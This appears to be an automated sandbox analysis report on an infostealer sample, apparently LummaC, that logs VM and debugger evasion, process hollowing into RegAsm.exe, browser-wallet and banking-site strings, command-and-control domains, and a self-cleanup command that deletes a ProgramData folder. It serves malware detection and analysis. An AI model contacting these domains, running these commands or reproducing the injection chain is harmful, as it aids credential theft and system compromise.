Code function: 3_2_00401160 GetSystemInfo,ExitProcess,

3_2_00401160

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\HDAFIIDAKJ.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: Amcache.hve.33.dr	Binary or memory string: VMware
Source: AAFIDG.29.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: AAFIDG.29.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: RegAsm.exe, 00000018.00000002.1483311475.00000000011CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW{
Source: AAFIDG.29.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: AAFIDG.29.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware9
Source: AAFIDG.29.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.33.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: AAFIDG.29.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: AAFIDG.29.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: RegAsm.exe, 00000003.00000002.1384359989.000000000146D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.1483311475.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.1938989194.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.1938989194.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000EDB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AAFIDG.29.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: AAFIDG.29.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: Amcache.hve.33.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: AAFIDG.29.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: Amcache.hve.33.dr	Binary or memory string: vmci.sys
Source: AAFIDG.29.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: AAFIDG.29.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: AAFIDG.29.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: AAFIDG.29.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.33.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.33.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.33.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.33.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000EDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: AAFIDG.29.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.33.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.33.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.33.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: AAFIDG.29.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Amcache.hve.33.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.33.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.33.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: AAFIDG.29.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Amcache.hve.33.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: AAFIDG.29.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: AAFIDG.29.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: AAFIDG.29.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: Amcache.hve.33.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: AAFIDG.29.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.33.dr	Binary or memory string: VMware Virtual USB Mouse
Source: AAFIDG.29.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.33.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.33.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.33.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.33.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: AAFIDG.29.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.33.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.33.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RegAsm.exe, 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`#G
Source: AAFIDG.29.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: AAFIDG.29.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: AAFIDG.29.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.33.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.33.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWpK
Source: AAFIDG.29.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: AAFIDG.29.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.33.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.33.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: AAFIDG.29.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: Amcache.hve.33.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.33.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: RegAsm.exe, 00000018.00000002.1483311475.0000000001196000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh3
Source: RegAsm.exe, 00000029.00000002.1938989194.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: AAFIDG.29.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: RegAsm.exe, 00000003.00000002.1384359989.000000000146D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWA
Source: AAFIDG.29.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 24_2_0043C800 LdrInitializeThunk,

24_2_0043C800

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_0041ACFA

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00404610 VirtualProtect ?,00000004,00000100,00000000

3_2_00404610

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_004195E0

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00419160 mov eax, dword ptr fs:[00000030h]		3_2_00419160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00415E38 mov eax, dword ptr fs:[00000030h]		29_2_00415E38

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

3_2_00405000

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041C8D9 SetUnhandledExceptionFilter,	3_2_0041C8D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041ACFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041A718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB7B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6CB7B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB7B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6CB7B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CD2AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6CD2AC62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0041C8F8 SetUnhandledExceptionFilter,	29_2_0041C8F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0041AD5F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	29_2_0041AD5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0041A724 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_0041A724
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6C9EB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	29_2_6C9EB66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6C9EB1F7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_6C9EB1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB9AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_6CB9AC62

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 7412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: userIEHDAFHDHC.exe PID: 7444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3180, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_032C24A1 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_032C24A1

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: caffegclasiqwp.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stamppreewntnq.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stagedchheiqwo.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: millyscroqwp.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: evoliutwoqm.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: condedqpwqm.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: traineiwnqo.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: locatedblsoqp.shop

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	3_2_004190A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0040FD2A _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	29_2_0040FD2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0040FE05 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	29_2_0040FE05

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E22008	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F82008	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63B000	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63C000	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 84F008	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8AF008
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63B000
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63C000
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BDD008

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userFBKFCFBFID.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userIEHDAFHDHC.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userFBKFCFBFID.exe "C:\Users\userFBKFCFBFID.exe"	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userIEHDAFHDHC.exe "C:\Users\userIEHDAFHDHC.exe"	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\DHCGHDHIDH.exe "C:\ProgramData\DHCGHDHIDH.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\HDAFIIDAKJ.exe "C:\ProgramData\HDAFIIDAKJ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIIJDHCGCBK" & exit	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
